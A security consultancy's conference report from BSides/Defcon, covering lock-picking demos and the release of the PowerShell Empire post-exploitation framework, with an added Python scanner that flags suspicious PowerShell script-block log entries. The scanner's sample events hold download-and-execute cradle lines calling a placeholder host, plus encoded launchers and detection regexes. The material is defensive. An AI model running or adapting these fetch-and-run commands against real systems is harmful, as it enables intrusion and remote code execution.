Report from BlackHat / Defcon conference in Las Vegas
The author is one of our Loop security experts, specialising in penetration testing. He advises Loop clients on various aspects of information security. He is also an expert lock picker, and believes that with the rapid advances in security technology it is easy to overlook how important physical security is for securing an organisation’s data and systems. If you have a question for him, please email firstname.lastname@example.org.
We started the morning at B-Sides Las Vegas, spent a bit of time with the lock pickers and even learnt a few new interesting bypass tricks to open locks and doorways with minimal effort (no lock picking required). Met some very skilled and experienced lock pickers who also showed me a few new ways of teaching people how to pick (including using a hand-made novelty-sized custom lock ‘cylinder’ as a demonstration aid). Also watched a fellow enthusiast pick his way out of four pairs of handcuffs (all attached at once, see photo)…
There were great vibes from everyone at the conference. All the participants in the talks (audience and speakers) were quite casual, and because the talks/rooms were fairly small (no more than 50-100 people per track), there was lots of feedback and quite lively discussion.
The best talk/presentation I saw was:
“Building an Empire with PowerShell” - http://sched.co/3ueO
The ‘Empire’ framework for PowerShell post-exploitation was released. It is essentially a pure PowerShell post-exploitation agent that can be used as a remote access tool (RAT) and can run entirely in memory. It also combines features of other powerful tools such as Mimikatz, and its behaviour and communication methods can easily be modified to evade network detection.
While this tool is being released for use by pen-testers working in red-team engagements, its aim is also to help improve SOC and IR analysis/response procedures around infections in the environment by forcing them to analyse memory dumps of compromised machines to determine what has happened and how to defend against it. There's a stack of really cool features which I could go on about at length, but it is all summarised nicely in the links below:
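The detection side of that trade-off, as an added example that is not part of the original post or of the Empire project: a small Python scanner that runs over PowerShell Script Block Logging records (Event ID 4104, the Windows feature that records the text of each script block PowerShell executes, so an agent that never touches disk still leaves a trace there) and flags the traits described above, in-memory execution and encoded or downloaded payloads. The event rows, host names, URLs and rule names are all constructed for the example.

```python
"""Triage PowerShell Script Block Logging events (Event ID 4104) for in-memory tooling traits.

Added example: the event rows below are constructed, not real telemetry, and the
rule names are this example's own. Script Block Logging records the text of each
script block PowerShell runs, so a pure-PowerShell, in-memory agent still shows up
here even when nothing is written to disk.
"""
import base64
import re

# Encoded-command heuristic: -e / -enc / -EncodedCommand followed by a base64 blob.
ENCODED = re.compile(r"(?<![\w-])-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)

RULES = [
    # Invoke-Expression fed by a web download: code runs without ever being written to disk.
    ("download-cradle",
     re.compile(r"\b(?:IEX|Invoke-Expression)\b.*\b(?:DownloadString|DownloadData|DownloadFile)\b",
                re.IGNORECASE)),
    # Launcher hides its console window from the logged-on user.
    ("hidden-window", re.compile(r"(?<![\w-])-w(?:indowstyle)?\s+hidden", re.IGNORECASE)),
    ("encoded-command", ENCODED),
    # .NET assembly loaded straight from memory.
    ("in-memory-load", re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\(", re.IGNORECASE)),
    # Inline base64 blob being unpacked at run time.
    ("base64-inline", re.compile(r"FromBase64String\(", re.IGNORECASE)),
]


def decode_encoded_command(b64: str):
    """Decode a PowerShell -EncodedCommand blob (base64 over UTF-16LE); None if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(script_block: str) -> list:
    """Return the sorted rule names that fire on one script block, including rules
    that fire only on the decoded payload of an encoded command (prefixed 'decoded:')."""
    hits = {name for name, pattern in RULES if pattern.search(script_block)}
    match = ENCODED.search(script_block)
    if match:
        decoded = decode_encoded_command(match.group(1))
        if decoded:
            hits.update("decoded:" + name for name, pattern in RULES if pattern.search(decoded))
    return sorted(hits)


def scan_events(events) -> list:
    """Return (host, rules) for every 4104 record that trips at least one rule."""
    findings = []
    for event_id, host, script_block in events:
        if event_id != 4104:  # only script block text is scanned here
            continue
        rules = analyse(script_block)
        if rules:
            findings.append((host, rules))
    return findings


# Constructed sample records: (event_id, host, ScriptBlockText). Host ws03 shows why the
# decode step matters: the outer command line only reveals the cradle once decoded.
_INNER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
_ENCODED_BLOB = base64.b64encode(_INNER.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    (4104, "ws01", "Get-ChildItem C:\\Users | Measure-Object"),
    (4104, "ws02", "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/launcher')"),
    (4104, "ws03", "powershell -NoP -W Hidden -Enc " + _ENCODED_BLOB),
    (4104, "ws04", "[System.Reflection.Assembly]::Load([Convert]::FromBase64String($blob))"),
    (4103, "ws05", "Module logging record, ignored by this scanner"),
]

if __name__ == "__main__":
    for host, rules in scan_events(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(rules)}")
```

The point of the decode step is that an encoded launcher looks like an opaque blob in the raw event; only after reversing the base64/UTF-16LE wrapping does the download cradle become visible, which is exactly the kind of analysis the post says SOC and IR teams are being pushed to do. The same rules are a starting point for a memory-dump triage, since the script block text is what ends up resident in the PowerShell process.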
While we currently deploy various PowerShell scripts during pen-testing, it's not nearly as effective as this.
I’ll definitely be using these tools in future engagements so clients better watch out!